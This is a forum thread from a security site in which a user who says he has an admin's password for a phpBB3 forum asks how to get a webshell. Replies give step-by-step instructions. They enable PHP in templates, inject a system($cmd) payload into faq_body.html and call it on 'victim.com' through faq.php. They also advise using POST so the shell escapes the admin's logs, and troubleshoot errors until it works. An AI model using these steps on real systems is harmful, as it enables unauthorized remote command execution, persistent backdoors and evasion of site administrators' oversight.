 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
phpbb3 how to get webshell |
 |
 Posted: Fri Dec 07, 2007 1:46 am |
 |
|
| akens |
| Regular user |
 |
|
| Joined: Dec 06, 2007 |
| Posts: 22 |
|
|
|
 |
|
 |
|
i get a admin's pwd ,but i login it find can't get webshell
phpbb2 can upload .sql and Resume database,phpbb3 can't do it
who tell me a way?
thnx for you help! |
|
|
|
|
| Posted: Fri Dec 07, 2007 1:34 pm |
|
|
| pexli |
| Valuable expert |
 |
|
| Joined: May 24, 2007 |
| Posts: 665 |
| Location: Bulgaria |
|
|
|
|
|
|
Admin panel-->Security settings Scroll down 'Allow php bla bla' put to ON.
Styles-->templates--->edit--->faq_blabla.html and put your code
<!-- PHP --> code <!-- ENDPHP -->
Then
http://victim.com/phpBB3/faq.php |
|
Last edited by pexli on Fri Dec 07, 2007 9:41 pm; edited 1 time in total |
|
|
|
| Posted: Fri Dec 07, 2007 2:29 pm |
|
|
| akens |
| Regular user |
|
|
| Joined: Dec 06, 2007 |
| Posts: 22 |
|
|
|
|
|
|
|
| koko wrote: | | koko wrote: | Admin panel-->Security settings Scroll down 'Allow php bla bla' put to ON.
Styles-->templates--->edit--->faq_blabla.html and put your code
<!-- PHP --> code <!-- END PHP --> |
Then
http://victim.com/phpBB3/faq.php |
thnx koko ,i will test!! |
|
|
|
|
| Posted: Fri Dec 07, 2007 4:04 pm |
|
|
| akens |
| Regular user |
|
|
| Joined: Dec 06, 2007 |
| Posts: 22 |
|
|
|
|
|
|
|
I regret that I failed the test.
i change the code to c99shell,then visit faq.php,but it's not working!
Test environment:winxp+mysql5.0+php+phpbb3 v3.0.RC8
I would very much like to know that this is how the case
thnx again! |
|
|
|
|
| Posted: Fri Dec 07, 2007 7:53 pm |
|
|
| pexli |
| Valuable expert |
|
|
| Joined: May 24, 2007 |
| Posts: 665 |
| Location: Bulgaria |
|
|
|
|
|
|
c99 sucks.Only lamers use this shell.Learn to use some sample code.Like
<?php echo "$cmd" ?>
<? system($cmd) ?>
This code work much much beter than your c99 and a'm not write in my post to delete all faq_blabla.html code and put your code in there. |
|
|
|
|
| Posted: Sat Dec 08, 2007 1:02 pm |
|
|
| pexli |
| Valuable expert |
|
|
| Joined: May 24, 2007 |
| Posts: 665 |
| Location: Bulgaria |
|
|
|
|
|
|
| Tested on RC8 few min ago and working. |
|
|
|
|
| Posted: Sat Dec 08, 2007 2:02 pm |
|
|
| akens |
| Regular user |
|
|
| Joined: Dec 06, 2007 |
| Posts: 22 |
|
|
|
|
|
|
|
According to your tips,I also tested a whole day, or not achieve the desired results.Insert code has indeed been Analysis,But does not seem to include in the faq.php.Do not know what went wrong steps.
my steps:
1:Admin panel-->Security settings -->allow php templates (yes)
2:Styles-->templates--->edit--->faq_body.html and put code
<!-- PHP -->
<? system($cmd) ?>
<!-- END PHP -->
i don't delete faq_blabla.html code
3:visit http://*****.com/phpBB3/faq.php?cmd=ls
Such steps are wrong? |
|
|
|
|
|
|
|
|
| Posted: Sat Dec 08, 2007 3:23 pm |
|
|
| pexli |
| Valuable expert |
|
|
| Joined: May 24, 2007 |
| Posts: 665 |
| Location: Bulgaria |
|
|
|
|
|
|
| akens wrote: | According to your tips,I also tested a whole day, or not achieve the desired results.Insert code has indeed been Analysis,But does not seem to include in the faq.php.Do not know what went wrong steps.
my steps:
1:Admin panel-->Security settings -->allow php templates (yes)
2:Styles-->templates--->edit--->faq_body.html and put code
<!-- PHP -->
<? system($cmd) ?>
<!-- END PHP -->
i don't delete faq_blabla.html code
3:visit http://*****.com/phpBB3/faq.php?cmd=ls
Such steps are wrong? |
<!-- PHP --> @system($cmd) <!-- ENDPHP -->
You know diference of method POST and GET?If admin looks in logs will see something like this GET phpBB3/faq.php?cmd=ls and your shell will be deleted. |
|
|
|
|
|
|
|
|
| Posted: Sat Dec 08, 2007 4:41 pm |
|
|
| akens |
| Regular user |
|
|
| Joined: Dec 06, 2007 |
| Posts: 22 |
|
|
|
|
|
|
|
i test only in my localhost!
GET OR POST to get shell influential?
The question now is the key to insert the normal implementation of the code
please forgive my ignorance, I will try to find some information to supplement knowledge!
As a novice, the only thing I can do is to
spend a lot of time and effort to understand the issue, thank you has been to my help!
if have a video ,I think I will progress faster  |
|
|
|
|
|
|
|
|
| Posted: Sat Dec 08, 2007 9:32 pm |
|
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| akens wrote: | i test only in my localhost!
GET OR POST to get shell influential?
The question now is the key to insert the normal implementation of the code
please forgive my ignorance, I will try to find some information to supplement knowledge!
As a novice, the only thing I can do is to
spend a lot of time and effort to understand the issue, thank you has been to my help!
if have a video ,I think I will progress faster |
If "register_globals" is off, then you must access $_GET or $_POST directly anyway! |
|
|
|
|
| Posted: Sat Dec 08, 2007 9:44 pm |
|
|
| akens |
| Regular user |
|
|
| Joined: Dec 06, 2007 |
| Posts: 22 |
|
|
|
|
|
|
|
Test success
thnx koko and Waraxe's help! |
|
|
|
|
| Posted: Sun Jun 01, 2008 9:15 pm |
|
|
| siurek22 |
| Regular user |
|
|
| Joined: May 31, 2008 |
| Posts: 13 |
|
|
|
|
|
|
|
i have problem with it when i put your code site give me error
"Parse error: syntax error, unexpected '}' in /home/zycien/domains/zfn.pl/public_html/forum/includes/template.php(175) : eval()'d code on line 1" |
|
|
|
|
| Posted: Mon Jun 02, 2008 1:22 am |
|
|
| gibbocool |
| Advanced user |
 |
|
| Joined: Jan 22, 2008 |
| Posts: 208 |
|
|
|
|
|
|
|
| Check the "}" are correct in the code. It seems there is one too many, or one out of place. If you have no idea what I'm talking about then post the code here and I will fix it. |
|
|
|
|
| Posted: Mon Jun 02, 2008 4:40 am |
|
|
| siurek22 |
| Regular user |
|
|
| Joined: May 31, 2008 |
| Posts: 13 |
|
|
|
|
|
|
|
| Code: | <!-- PHP -->
<? system($cmd); ?>
<!-- END PHP --> |
i used this code and i don't know why it is that bexause in this code have any"}" :/ |
|
|
|
|
| Posted: Mon Jun 02, 2008 6:31 am |
|
|
| pexli |
| Valuable expert |
|
|
| Joined: May 24, 2007 |
| Posts: 665 |
| Location: Bulgaria |
|
|
|
|
|
|
| siurek22 remove <? ?> from code. |
|
|
|
|
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 2
Goto page 1, 2Next
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 223
Members: 0
Total: 223
